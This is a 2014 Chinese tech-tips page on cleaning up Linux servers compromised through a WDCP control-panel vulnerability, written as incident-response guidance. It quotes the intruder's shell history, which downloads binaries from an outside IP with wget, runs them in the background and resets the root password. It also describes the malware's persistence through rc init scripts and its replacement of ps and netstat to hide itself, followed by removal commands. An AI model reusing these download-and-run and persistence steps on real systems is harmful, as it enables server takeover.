首页 > 上网技巧 > 电脑小技巧 > 2014年10月WDCP面板漏洞导致被入侵解决方案

2014年10月WDCP面板漏洞导致被入侵解决方案

时间:2014-11-04 09:45 作者:QQ地带 我要评论

这是整理比较典型的栗子,仅供参考。
为了确认是否一样,你可以先ssh连接,运行:
 
  1. history 
入侵后留下的命令记录如下:
 
  1. wget http://ip/3.rar 
  2. chmod 0755 /root/3.rar 
  3. chmod 0755 ./3.rar 
  4. /dev/null 2>&1 & 
  5. nohup ./3.rar > /dev/null 2>&1 & 
  6.  passwd rootpasswd root 
  7. passwd root 
  8.  Changing password for user root. 
  9. New password: 
  10. Retype new password: 
  11. passwd: all authentication tokens updated successfully. 
  12. reboot 
  13. cd /root 
  14. wget http://60.172.229.178/3.rar 
  15. chmod 0755 /root/3.rar 
  16. chmod 0755 ./3.rar 
  17. /dev/null 2>&1 & 
  18. nohup ./3.rar > /dev/null 2>&1 & 
  19. cd /root 
  20. wget http://60.172.229.178/888.rar 
  21. chmod 0755 /root/888.rar 
  22. chmod 0755 ./888.rar 
  23. /dev/null 2>&1 & 
  24. nohup ./888.rar > /dev/null 2>&1 & 
  25. cd /root 
  26. wget http://60.172.229.178/888.rar 
  27. chmod 0755 /root/888.rar 
  28. chmod 0755 ./888.rar 
  29. /dev/null 2>&1 & 
  30. nohup ./888.rar > /dev/null 2>&1 & 
  31. passwd root 
 
 
下面主要写一下3.rar(注意这是个二进制程序,而非压缩包)执行后修改过的文件,给大家修复提供参考。
 
创建文件:
 
  1. /etc/rc.d/init.d/DbSecuritySdt 
  2. /etc/rc.d/rc1.d/S97DbSecuritySdt 
  3. /etc/rc.d/rc2.d/S97DbSecuritySdt 
  4. /etc/rc.d/rc3.d/S97DbSecuritySdt 
  5. /etc/rc.d/rc4.d/S97DbSecuritySdt 
  6. /etc/rc.d/rc5.d/S97DbSecuritySdt 
上面的文件内容都一样,内容为:
 
  1. #!/bin/bash 
  2. /root/3.rar 
目的是让3.rar重启后自动运行。
 
创建文件:
 
  1. /usr/bin/bsd-port/getty 
文件内容和3.rar相同。
同目录下还有conf.n和getty.lock。
 
创建文件:
/usr/bin/acpid
文件内容和3.rar相同。
 
创建文件:
 
  1. /etc/rc.d/init.d/selinux 
  2. /etc/rc.d/rc1.d/S99selinux 
  3. /etc/rc.d/rc2.d/S99selinux 
  4. /etc/rc.d/rc3.d/S99selinux 
  5. /etc/rc.d/rc4.d/S99selinux 
  6. /etc/rc.d/rc5.d/S99selinux 
文件内容如下:
 
  1. #!/bin/bash 
  2. /usr/bin/bsd-port/getty 
目的还是让恶意程序在系统重启后自动行动。
 
创建目录:
 
  1. /usr/bin/dpkgd/ 
目录下有二个程序:
 
  1. netstat  ps 
这个是系统中正常的程序,转移到这里做了备份。
 
替换掉了系统中的/bin/ps和/bin/netstat。
替换后的程序在执行后可以隐藏掉恶意程序的相关执行信息,并且加入了复活恶意程序的功能。
 
文件操作到此结束。
 
如果确定和本文描述的入侵情况完全相同,可以用下面的命令修复:
 
  1. killall 3.rar getty acpid 
  2. killall 888.rar getty acpid 
  3. rm -f /etc/rc.d/rc*.d/S97DbSecuritySdt 
  4. rm -f /etc/rc.d/init.d/DbSecuritySdt 
  5. rm -rf /usr/bin/bsd-port/ 
  6. rm -f /usr/bin/acpid 
  7. rm -f /etc/init.d/selinux 
  8. rm -f /etc/rc.d/rc*.d/S99selinux 
  9. rm -f /bin/ps /bin/netstat 
  10. cp /usr/bin/dpkgd/ps /bin/ 
  11. cp /usr/bin/dpkgd/netstat /bin/ 
 
这次的WDCP漏洞中,这个3.rar和888.rar做的恶比较多,但它并不是唯一的做恶者(其他的人或者程序会留下其他的东西,不在上面的描述范围内)。
最早的入侵痕迹在10月初已经出现,3.rar出现的比较晚,但是出现的多,而且表面上造成的影响比较大(对外扫描肯定会导致机器被封,在国外某些主机商甚至会BAN帐号)。
 
谢谢网友提供解决方案。

标签: wdcp
顶一下
(122)
100%
踩一下
(0)
0%

Google提供的广告